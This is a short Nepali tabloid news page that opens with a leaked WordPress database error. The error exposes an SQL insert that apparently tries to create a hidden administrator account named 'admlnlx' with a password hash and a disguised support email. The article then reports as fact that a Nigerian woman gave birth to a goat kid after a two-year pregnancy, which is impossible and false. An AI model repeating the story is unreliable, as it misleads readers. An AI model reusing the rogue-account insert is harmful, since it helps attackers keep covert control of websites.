WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjjUob4O6Kqc13ST.hxVfad8dIsH/C0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 07:23:16', '', 'admlnlx', 'admlnlx')
नाइजेरिया,माघ २८ –
गएको मंगलबार नाइजेरियामा एउटा अनौठो घटना भयो । नाइजेरियाको रिभर राज्यमा एक महिलाले बाख्राको पाठो जस्तै शिशु जन्माएपछि सबैजना छक्क परे । दुई वषदेखि गर्भवती रहेकी ती महिलाले बच्चा जन्माइन् । तर बाख्राको पाठा जस्तो । बाख्राको पाठो जस्तो शिशु जन्मिएपछि हेर्ने मान्छे पनि ठूलो भिड लागेको थियो ।बाख्राको पाठो मान्छेले जन्माएपछि सामाजिक सञ्जालमा पनि त्यो फोटो भाइरल भएको थियो ।
ती महिलाका परिवार बाख्राको पाठो जन्मिएको घटनाले लज्जित भएको छभने दुई वर्ष वर्षदेखिको पीडाबाट महिला मुक्त भएकोमा खुसी पनि त्यती नै भएको डेलीपोस्टले खबर लेखेको छ ।